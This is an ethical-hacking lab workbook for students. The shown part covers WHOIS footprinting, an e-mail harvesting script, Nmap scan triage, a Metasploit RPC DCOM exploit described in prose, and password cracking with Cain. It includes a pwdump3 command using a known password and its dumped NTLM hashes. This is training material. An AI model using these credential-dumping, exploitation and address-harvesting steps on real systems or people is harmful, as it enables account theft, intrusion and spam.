
C|EH Lab Workbook

Student handout

Table of Contents
Lesson 1: FOOTPRINTING
I/ Introduction to Footprinting
II/ Lab exercises
Lab 1: Finding information about a domain
Lab 2: Finding e-mail addresses
Lesson 2: SCANNING
I/ Introduction to Scanning
II/ Lab exercises
Lab 1: Using Nmap
Lab 2: Using Retina to detect vulnerabilities and attacking with the Metasploit Framework
Lesson 3: SYSTEM HACKING
I/ Introduction to System Hacking
II/ Labs
Lab 1: Cracking passwords on the local machine
Lab 2: Using pwdump3v2 with one administrator account on the victim machine to obtain the remaining users' information
Lab 3: Privilege escalation through Kaspersky Lab
Lab 4: Using a keylogger
Lab 5: Using a rootkit and clearing log files
Lesson 4: TROJANS AND BACKDOORS
I/ Introduction to Trojans and Backdoors
II/ Lab exercises
Lab 1: Using netcat
Lab 2: Using the Beast Trojan and detecting the trojan
(To use the Beast Trojan we must build a server file and install it on the victim machine; that server listens on a chosen port, and from the attacking machine we connect to the victim through that port.)
Lab 3: Using a web-based Trojan
Lesson 5: SNIFFING METHODS
I/ Introduction to Sniffing
Lesson 6: Denial of Service (DoS) attacks
I/ Introduction
II/ Lab description
Lab 1: DoS using Ping of Death
Lab 2: DoS against a protocol with no authentication (RIP in this lab)
Lab 3: DDoS using Flash
Lesson 7: Social Engineering
I/ Introduction
VSIC Education Corporation

II/ Labs
Lab 1: Sending an anonymous e-mail with a Trojan attachment
Lesson 8: Session Hijacking
I/ Introduction
II/ Performing the lab
Lesson 9: Hacking Web Servers
I/ Introduction
II/ Performing the lab
Lab 1: Attacking a Windows 2003 web server (Apache vulnerability)
Lab 2: Exploiting a vulnerability in the Server U application
Lesson 10: WEB APPLICATION HACKING
I/ Introduction
II/ Labs
Lab 1: Cross Site Scripting
Lab 2: Insufficient Data Validation
Lab 3: Cookie Manipulation
Lab 4: Authorization Failure
Lesson 11: SQL INJECTION
I/ Introduction to SQL Injection
II/ Labs
Lesson 12: WIRELESS HACKING
I/ Introduction
II/ Labs
Lesson 13: VIRUS
I/ Introduction (see the supplementary reading)
II/ Labs
Lab 1: A virus that destroys data on the machine
Lab 2: The "gaixinh" virus spreading through instant messages
Lesson 14: BUFFER OVERFLOW
I/ Theory
II/ Practice


Lesson 1:

FOOTPRINTING
I/ Introduction to Footprinting:
Footprinting is the technique a hacker uses to gather information about a business, an individual or an organization. A great deal can be learned about a target this way. In lab 1 we apply it to a domain (www.itvietnam.com as the example) and find out whose e-mail address is the contact for that domain; in lab 2 we track down a list of e-mail addresses for a given keyword, a method that also serves businesses wanting to market by e-mail. In this phase the hacker tries to collect as much information as possible about the business (through the Internet and by phone) and about individuals (through e-mail and their activity on the Internet). Done well, this step tells the hacker which of our weak points to attack. For example, to take over the domain www.itvietnam.com the hacker needs to know which e-mail address owns the domain, then obtain that mailbox's password by attacking the mail server or by sniffing the local network, and finally use the owner's mailbox to seize the domain itself.
II/ Lab exercises:
Lab 1: Finding information about a domain
Go to www.whois.net and enter the domain you want to look up.

We then receive the following information:


Registrar Name....: BlueHost.Com


Registrar Whois...: whois.bluehost.com
Registrar Homepage: http://www.bluehost.com/
Domain Name: ITVIETNAM.COM
Created on..............: 1999-11-23 11:31:30 GMT
Expires on..............: 2009-11-23 00:00:00 GMT
Last modified on........: 2007-07-30 03:15:11 GMT
Registrant Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax..:
Email: jkow@itvietnam.com
Last modified: 2007-03-23 04:12:24 GMT
Administrative Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax..:
Email: jkow@itvietnam.com
Last modified: 2007-03-23 04:12:24 GMT
Technical Info: (FAST-12785240)
Attn: itvietnam.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way
Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: whois@bluehost.com
Last modified: 2007-04-05 16:50:56 GMT


Status: Locked
Note the Status: Locked line at the end of the record: a registrar transfer lock stops the domain being moved to another registrar until the owner unlocks it, which is why the attack described in the introduction goes through the registrant's mailbox rather than through the transfer process directly.
Besides looking up the domain record as above, we can use a Reverse IP domain lookup utility to see how many other hosts share the same IP address as our site. Use the following link for this utility:
http://www.domaintools.com/reverse-ip/

This information is very useful to a hacker: from the list of sites sharing the server, the hacker can break in through any vulnerable website on the list, attack the server, and from there take control of every website hosted on it.
Lab 2: Finding e-mail addresses
In this lab we use the program 1st Email Address Spider to search for e-mail addresses. A hacker uses it to gather more information about mailboxes or to filter out particular groups of addresses; you can also use the tool to collect addresses for marketing purposes, for example every address ending in @vnn.vn or @hcm.vnn.vn in order to market a product.
We can configure which site the program pulls its results from; in this lab I use google.com as the search engine.

Then enter the keyword vnn.vn in the keyword field.

Afterwards we obtain a list of e-mail addresses thanks to this program.
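The two labs above are done with a browser and a GUI spider. The script below is an added example (not part of this workbook and not the code of whois.net or 1st Email Address Spider) of the same two steps in Python: pulling the registrar, dates and contact mailboxes out of a WHOIS record, and harvesting addresses for a given domain from scraped text, including the "[at]" / "DOT" spellings people use to defeat naive harvesters. WHOIS_RECORD is an excerpt of the itvietnam.com record shown earlier in this lab; SEARCH_SNIPPET and its addresses are constructed; whois.verisign-grs.com is the .com registry WHOIS server, used only by the optional network helper.

```python
"""Footprinting helpers: parse a WHOIS record and harvest e-mail addresses.

Added example, not part of the original lab manual. WHOIS_RECORD is an
excerpt of the itvietnam.com record shown above; SEARCH_SNIPPET is a
constructed stand-in for text scraped from a search engine.
"""
import re
import socket

WHOIS_RECORD = """\
Registrar Name....: BlueHost.Com
Registrar Whois...: whois.bluehost.com
Domain Name: ITVIETNAM.COM
Created on..............: 1999-11-23 11:31:30 GMT
Expires on..............: 2009-11-23 00:00:00 GMT
Registrant Info: (FAST-12836461)
VSIC Education Corporation
Phone: +84.88363691
Email: jkow@itvietnam.com
Technical Info: (FAST-12785240)
C/O BlueHost.Com Domain Privacy
Email: whois@bluehost.com
Status: Locked
"""

# Constructed: the obfuscation tricks a harvester has to undo before matching.
SEARCH_SNIPPET = """\
Lien he: sales@hcm.vnn.vn hoac kythuat [at] vnn [dot] vn
Webmaster: admin(at)example.com ; backup: admin@example.com
Call us: 08 8363691 - info AT vnn DOT vn
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# 'Field....: value' lines; the dots are the leader padding whois.net prints.
WHOIS_FIELD_RE = re.compile(r"^([A-Za-z ]+?)\.*\s*:\s*(.+)$", re.M)


def whois_query(domain, server="whois.verisign-grs.com", timeout=10):
    """Raw WHOIS (RFC 3912): TCP/43, send the query line, read to EOF.
    Network call, deliberately not used by the offline demo below."""
    with socket.create_connection((server, 43), timeout=timeout) as sock:
        sock.sendall(domain.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_whois(text):
    """Map each field name to the list of values seen (Email repeats per contact)."""
    fields = {}
    for key, value in WHOIS_FIELD_RE.findall(text):
        fields.setdefault(key.strip(), []).append(value.strip())
    return fields


def normalize_obfuscated(text):
    """Rewrite '[at]', '(at)', ' AT ' and '[dot]', '(dot)', ' DOT ' to '@' and '.'."""
    text = re.sub(r"\s*[\[(]\s*at\s*[\])]\s*", "@", text, flags=re.I)
    text = re.sub(r"\s*[\[(]\s*dot\s*[\])]\s*", ".", text, flags=re.I)
    text = re.sub(r"\s+AT\s+", "@", text)   # upper-case only: leaves the word 'at' alone
    text = re.sub(r"\s+DOT\s+", ".", text)
    return text


def harvest_emails(text, domain_suffix=None):
    """Unique, lower-cased addresses in text; optionally only those under domain_suffix."""
    found = {m.lower() for m in EMAIL_RE.findall(normalize_obfuscated(text))}
    if domain_suffix:
        suffix = domain_suffix.lower()
        found = {e for e in found
                 if e.split("@", 1)[1] == suffix or e.split("@", 1)[1].endswith("." + suffix)}
    return sorted(found)


def summarize_domain(whois_text):
    """The facts a footprinter wants: registrar, lifetime, contacts, privacy proxy, lock."""
    fields = parse_whois(whois_text)
    first = lambda name: fields.get(name, [""])[0]
    return {
        "domain": first("Domain Name").lower(),
        "registrar": first("Registrar Name"),
        "created": first("Created on"),
        "expires": first("Expires on"),
        "contacts": harvest_emails(whois_text),
        "privacy_proxy": "Domain Privacy" in whois_text,
        "transfer_locked": first("Status").lower() == "locked",
    }


if __name__ == "__main__":
    print(summarize_domain(WHOIS_RECORD))
    print(harvest_emails(SEARCH_SNIPPET, "vnn.vn"))
```

On the record above this reports the registrant contact jkow@itvietnam.com alongside the registrar's privacy address, and flags that the domain is transfer-locked; on the constructed snippet the vnn.vn filter keeps three of the four addresses and drops the example.com one.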


Lesson 2:

SCANNING
I/ Introduction to Scanning:
Scanning, also called network scanning, is an indispensable step in a hacker's attack on a network. Done well, it lets the hacker quickly find the system's vulnerabilities, for instance the Windows RPC vulnerability or vulnerabilities in web server software such as Apache. From those vulnerabilities the hacker can use malicious code (obtained from websites) to attack the system and, at a minimum, get a shell.
There are many kinds of scanning software: commercial products such as Retina and GFI, and free ones such as Nmap and Nessus. The commercial versions can usually update their vulnerability checks from the Internet and therefore detect more recent vulnerabilities. Scanners help the administrator find the system's weaknesses and at the same time suggest fixes, such as applying service packs and patches or using more appropriate policies.
II/ Lab exercises
Lab 1: Using Nmap
Before doing this lab, students should review the theory material on Nmap's options.
We can use the copy on the CEH v5 CD or download the latest version from www.insecure.org. Nmap comes in Windows and Linux builds; in this lab we use the Windows build. Note that a SYN scan sends raw packets, so on Windows it needs WinPcap and an administrative account.
For this lab, students should use VMware and boot several different operating systems, such as Windows XP SP2, Windows 2003 SP1, Linux Fedora Core and Windows 2000 SP4.
First use Nmap to find out which hosts in the subnet are up and which ports they have open. Run nmap -h to review the options, then run nmap -sS 10.100.100.1-20, which gives the following result:
C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20
Starting Nmap 4.20 ( http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Interesting ports on 10.100.100.6:
Not shown: 1678 closed ports
PORT STATE SERVICE
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
23/tcp open telnet
42/tcp open nameserver
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
2105/tcp open eklogin
3389/tcp open ms-term-serv
8080/tcp open http-proxy
MAC Address: 00:0C:29:59:97:A2 (VMware)
Interesting ports on 10.100.100.7:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)
Interesting ports on 10.100.100.11:
Not shown: 1695 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:A6:2E:31 (VMware)
Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support
scanning your own machine (localhost) this way.
All 0 scanned ports on 10.100.100.13 are

Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
Interesting ports on 10.100.100.20:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
1000/tcp open cadlock
5101/tcp open admdog
MAC Address: 00:15:C5:65:E3:85 (Dell)
Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds
Seven hosts are up in total: six VMware machines (counting the scanning host 10.100.100.13 itself, which Nmap on Windows cannot SYN-scan) and one Dell PC. The next step is to identify the operating system of each host with nmap -v -O <ip address>. Here we run nmap -vv -O 10.100.100.7, where -vv prints the scan steps in detail:
C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7
Starting Nmap 4.20 ( http://insecure.org ) at 2007-08-02 10:46 Pacific Standard Time
Initiating ARP Ping Scan at 10:46
Scanning 10.100.100.7 [1 port]
Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:46
Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed
Initiating SYN Stealth Scan at 10:46
Scanning 10.100.100.7 [1697 ports]
Discovered open port 1025/tcp on 10.100.100.7
Discovered open port 445/tcp on 10.100.100.7
Discovered open port 135/tcp on 10.100.100.7
Discovered open port 139/tcp on 10.100.100.7
Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports)
Initiating OS detection (try #1) against 10.100.100.7
Host 10.100.100.7 appears to be up ... good.
Interesting ports on 10.100.100.7:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows 2003 Server SP1
OS Fingerprint:
OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C
29%TM=46B2187
OS:3%P=i686-pc-windowswindows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0)
OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT0
0%O4=M5B4NW0NNT0
OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=F
AF0%W3=FAF0%W4=F
OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NN
S%CC=N%Q=)T1(R=Y
OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=
Z%A=S%F=AR%O=%RD
OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT
00NNS%RD=0%Q=)T4
OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T
=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=
0%Q=)T7(R=Y%DF=N%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0
%IPL=B0%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%T
OSI=Z%CD=Z%SI=S%
OS:DLI=S)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IPID Sequence Generation: Incremental

OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 3.204 seconds
Raw packets sent: 1767 (78.460KB) | Rcvd: 1714 (79.328KB)
The fingerprints Nmap matches against can be inspected in C:\Program Files\Nmap\nmap-os-fingerprints.

Continue with the remaining machines.

C:\Documents and Settings\anhhao>nmap -O 10.100.100.1
Starting Nmap 4.20 ( http://insecure.org ) at 2007-08-02 10:54 Pacific Standard Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.12 (x86)
Uptime: 0.056 days (since Thu Aug 02 09:34:08 2007)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 2.781 seconds
There are, however, some hosts that Nmap cannot identify, as below:
C:\Documents and Settings\anhhao>nmap -O 10.100.100.16
Starting Nmap 4.20 ( http://insecure.org ) at 2007-08-02 10:55 Pacific Standard Time
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://insecure.org/nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.20%D=8/2%OT=21%CT=1%CU=35147%PV=Y%DS=1%G=Y%M=000C2
9%TM=46B21A94
OS:%P=i686-pc-windowswindows)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%II=I%SS=S%TS=0)S
OS:EQ(SP=FD%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=0)OPS(O1=M5B4NW0NNT0
0NNS%O2=M5B
OS:4NW0NNT00NNS%O3=M5B4NW0NNT00%O4=M5B4NW0NNT00NNS%O5=M5B4
NW0NNT00NNS%O6=M5
OS:B4NNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6
=FAF0)ECN(R=Y%D
OS:F=Y%T=80%W=FAF0%O=M5B4NW0NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=
O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%
DF=Y%T=80%W=FAF0
OS:%S=O%A=S+%F=AS%O=M5B4NW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N%T=8
0%W=0%S=A%A=O%F=

OS:R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0
%Q=)T6(R=Y%DF=N%T
OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z
%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=80%TOS=0%IPL=38%UN=0%RIPL=G%RID=G%RIPCK
=G%RUCK=G%RUL=
OS:G%RUD=G)IE(R=Y%DFI=S%T=80%TOSI=S%CD=Z%SI=S%DLI=S)

Network Distance: 1 hop


OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 12.485 seconds

Still, the open ports tell us this is a server running SQL Server and a web server, so we now run nmap -p 80 -sV 10.100.100.16 to determine the IIS version:
C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16
Starting Nmap 4.20 ( http://insecure.org ) at 2007-08-02 11:01 Pacific Standard Time
Interesting ports on 10.100.100.16:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0
MAC Address: 00:0C:29:D6:73:6D (VMware)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 6.750 seconds
Since IIS 5.0 ships only with Windows 2000, we can be fairly confident this host is Windows 2000 Server even though the TCP/IP fingerprint gave no exact match. Beyond what we did here, Nmap can also show every packet it sends (--packet-trace), save its results to log files (-oN, -oX), and so on.
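A scan like the one above produces a lot of text, and the lab's own reasoning (which hosts are Windows, which run SQL Server and IIS, which legacy services are exposed) is done by eye. The script below is an added example, not from this workbook and not part of Nmap, that does that triage over Nmap's normal output: it splits the output into per-host blocks, reads the open ports and the MAC vendor, guesses a host's role from its port mix, and flags services an attacker would go after first. NMAP_OUTPUT is a shortened copy of the -sS result shown earlier; the RISK_NOTES table is this example's own judgement of why each service matters, not something Nmap reports.

```python
"""Triage of Nmap normal output: hosts up, open ports, services worth a closer look.

Added example, not from the lab manual. NMAP_OUTPUT is an excerpt of the
-sS scan shown above; RISK_NOTES is this example's own judgement, not Nmap's.
"""
import re

NMAP_OUTPUT = """\
Starting Nmap 4.20 ( http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Interesting ports on 10.100.100.6:
Not shown: 1678 closed ports
PORT STATE SERVICE
7/tcp open echo
19/tcp open chargen
23/tcp open telnet
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
MAC Address: 00:0C:29:59:97:A2 (VMware)
Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support
scanning your own machine (localhost) this way.
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
443/tcp open https
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds
"""

HOST_RE = re.compile(r"^Interesting ports on (\S+):", re.M)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.M)
MAC_RE = re.compile(r"^MAC Address: ([0-9A-F:]{17}) \((.*?)\)", re.M)

# Why a service matters to an attacker (this example's notes, keyed by Nmap service name).
RISK_NOTES = {
    "echo": "Simple TCP/IP Services: legacy, usable for traffic amplification; disable",
    "chargen": "Simple TCP/IP Services: legacy, usable for traffic amplification; disable",
    "telnet": "clear-text logins, trivially sniffed",
    "ftp": "clear-text logins unless wrapped in TLS",
    "msrpc": "RPC endpoint mapper; unpatched hosts exposed to MS03-026/MS03-039-class bugs",
    "microsoft-ds": "SMB: null sessions, password guessing, hash capture",
    "ms-sql-s": "SQL Server reachable from the network: 'sa' guessing, xp_cmdshell abuse",
    "ms-term-serv": "RDP: password-guessing target",
}


def parse_nmap(text):
    """Split normal-format output into host blocks.
    Returns {ip: {'ports': [(port, proto, state, service)], 'mac': str|None, 'vendor': str|None}}."""
    hosts = {}
    headers = list(HOST_RE.finditer(text))
    for i, m in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(text)
        block = text[m.start():end]
        mac = MAC_RE.search(block)
        hosts[m.group(1)] = {
            "ports": [(int(p), proto, state, svc) for p, proto, state, svc in PORT_RE.findall(block)],
            "mac": mac.group(1) if mac else None,
            "vendor": mac.group(2) if mac else None,
        }
    return hosts


def hosts_up(text):
    """The 'N hosts up' figure from Nmap's own summary line."""
    m = re.search(r"\((\d+) hosts? up\)", text)
    return int(m.group(1)) if m else None


def guess_role(info):
    """Coarse role from the open-port mix; useful when -O gives no exact match."""
    services = {svc for _, _, state, svc in info["ports"] if state == "open"}
    if "ms-sql-s" in services and services & {"http", "https"}:
        return "windows web + database server"
    if services & {"msrpc", "microsoft-ds", "netbios-ssn"}:
        return "windows host"
    if services & {"ssh", "rpcbind"}:
        return "unix-like host"
    return "unknown"


def triage(hosts):
    """Open ports whose service has a RISK_NOTES entry, as (ip, port, service, note)."""
    return [(ip, port, svc, RISK_NOTES[svc])
            for ip, info in hosts.items()
            for port, _, state, svc in info["ports"]
            if state == "open" and svc in RISK_NOTES]


if __name__ == "__main__":
    scan = parse_nmap(NMAP_OUTPUT)
    print(f"{hosts_up(NMAP_OUTPUT)} hosts up, {len(scan)} with port details")
    for ip, info in scan.items():
        print(ip, info["vendor"], guess_role(info))
    for finding in triage(scan):
        print("  ", finding)
```

Run against a full -sS result saved with -oN, the same functions give the inventory the Retina report below presents graphically: 10.100.100.16 is classified as a Windows web and database server from its ports alone, and the echo, chargen and telnet services on 10.100.100.6 are the first findings listed.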
Lab 2: Using Retina to detect vulnerabilities and attacking with the Metasploit Framework
Retina from eEye is a commercial product (like GFI, Shadow and others) that updates its vulnerability checks regularly and helps the system administrator work out how to fix what it finds.
Now we use Retina to scan the Windows 2003 SP0 machine (10.100.100.6) for vulnerabilities.
Report from Retina (only one host, 10.100.100.6, was scanned, so the report's Count column is omitted; the "top 20" vulnerability list contains 15 entries):

TOP 20 VULNERABILITIES
The following is an overview of the top 20 vulnerabilities on your network.

Rank  Vulnerability Name
 1.   echo service
 2.   ASN.1 Vulnerability Could Allow Code Execution
 3.   Windows Cumulative Patch 835732 Remote
 4.   Null Session
 5.   No Remote Registry Access Available
 6.   telnet service
 7.   DCOM Enabled
 8.   Windows RPC Cumulative Patch 828741 Remote
 9.   Windows RPC DCOM interface buffer overflow
10.   Windows RPC DCOM multiple vulnerabilities
11.   Apache 1.3.27 0x1A Character Logging DoS
12.   Apache 1.3.27 HTDigest Command Execution
13.   Apache mod_alias and mod_rewrite Buffer Overflow
14.   ApacheBench multiple buffer overflows
15.   HTTP TRACE method supported

TOP 20 OPEN PORTS
The following is an overview of the top 20 open ports on your network.

Rank  Port       Description
 1.   TCP:7      ECHO - Echo
 2.   TCP:9      DISCARD - Discard
 3.   TCP:13     DAYTIME - Daytime
 4.   TCP:17     QOTD - Quote of the Day
 5.   TCP:19     CHARGEN - Character Generator
 6.   TCP:23     TELNET - Telnet
 7.   TCP:42     NAMESERVER / WINS - Host Name Server
 8.   TCP:53     DOMAIN - Domain Name Server
 9.   TCP:80     WWW-HTTP - World Wide Web HTTP (Hyper Text Transfer Protocol)
10.   TCP:135    RPC-LOCATOR - RPC (Remote Procedure Call) Location Service
11.   TCP:139    NETBIOS-SSN - NETBIOS Session Service
12.   TCP:445    MICROSOFT-DS - Microsoft-DS
13.   TCP:1025   LISTEN - listen
14.   TCP:1026   NTERM - nterm
15.   TCP:1030   IAD1 - BBN IAD
16.   TCP:2103   ZEPHYR-CLT - Zephyr Serv-HM Connection
17.   TCP:2105   EKLOGIN - Kerberos (v4) Encrypted RLogin
18.   TCP:3389   MS RDP (Remote Desktop Protocol) / Terminal Services
19.   TCP:8080   Generic - Shared service port
20.   UDP:7      ECHO - Echo

TOP 20 OPERATING SYSTEMS
The following is an overview of the top 20 operating systems on your network.

Rank  Operating System Name
 1.   Windows Server 2003

So we have identified the operating system of 10.100.100.6, its open ports and its vulnerabilities. This is exactly the information an administrator needs in order to recognize and patch the weaknesses.
From the top 20 vulnerabilities we will exploit the RPC DCOM vulnerability (entries 9 and 10 in the list above) with the Metasploit Framework (CEH v5 CD); the module used below targets MS03-026, the RPC DCOM interface buffer overflow. Details of the vulnerability can be checked on eEye's own site, securityfocus.com or microsoft.com.
We use the Metasploit console to find the exploit matching the vulnerability Retina reported.

We can see the exploit msrpc_dcom_ms03_026.pm listed in Metasploit's exploit section. Now we launch the exploit against the target.

After the exploit succeeds we have a shell on the Windows 2003 machine, and from it we can upload a backdoor or pull whatever information we need from the host (this is covered in the following chapters).
Conclusion: scanning software is very important to the hacker for discovering a system's vulnerabilities; once a vulnerability is identified, the hacker can use a ready-made framework or code published on the Internet to take control of the target machine. The same tools are just as useful to the system administrator, who can use them to re-assess the security level of the system and to keep checking for newly disclosed vulnerabilities.
Lesson 3:

SYSTEM HACKING
I/ Introduction to System Hacking:
As we learned in the theory part, the System Hacking module covers techniques for obtaining usernames and passwords, escalating privileges on the system, using a keylogger to capture the victim's information (at this step the hacker may also plant a Trojan, the subject of the next chapter), hiding running processes with a rootkit, and clearing the system logs.
For obtaining local usernames and passwords, the hacker can crack them on the machine itself by installing software on it, or boot from a Knoppix CD to retrieve the syskey and then decrypt the SAM to obtain the hashes of the system accounts. Usernames and passwords can also be obtained remotely over SMB/NTLM (by sniffing, covered in a later chapter) or through a system account that is already known (using pwdump3).
For privilege escalation, the hacker can use vulnerabilities in Windows itself or in software running on the system to gain Administrator rights. In the lab we exploit a vulnerability in Kaspersky Lab 6.0 to escalate from an ordinary user to Administrator on Windows XP SP2.
For keylogging we use SC-KeyLog to watch the victim's activity: keystrokes, chat content, how the machine is used, and the user accounts in use.
Next we use a rootkit to hide the keylogger's processes so that the administrator cannot tell the machine is being monitored; here we use the Vanquish rootkit to hide processes on the system. Finally we clear the logs and the traces of the intrusion.
II/ Labs
Lab 1: Cracking passwords on the local machine

First we install Cain on the target machine and use it to recover the users' passwords.
Adding the user:

Start Cain and choose Import Hashes from local system.

Three modes are offered here. Import Hashes from local system reads the SAM of the running system to obtain the account hashes (already free of the syskey encryption). Import Hashes from text file takes a text file, usually produced by pwdump, holding the account hashes in the clear. The third option is for when we have the syskey and a SAM file still encrypted with it. In all three cases, given complete input, we end up with account hashes not encrypted by syskey, and from these hashes the program brute-forces the account passwords.
In this lab we select the user haovsic and choose Brute Force on the NTLM hash. Once selected, the PC starts computing and returns the result.

Lab 2: Using pwdump3v2 with one administrator account on the victim machine to obtain the remaining users' information

The victim machine runs Windows 2003 SP0 and already has a user quyen with password cisco; from this account we can obtain information about the other accounts on the machine.
First run pwdump3.exe on its own to see the parameters it expects. Then run pwdump3.exe 10.100.100.6 c:\hao2003sp0 quyen and enter user quyen's password when prompted.

Open the file hao2003sp0 to read the result:


aaa:1015:NO PASSWORD*********************:NO PASSWORD*********************:::
anhhao:1010:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
anhhao1:1011:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
anhhao2:1013:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
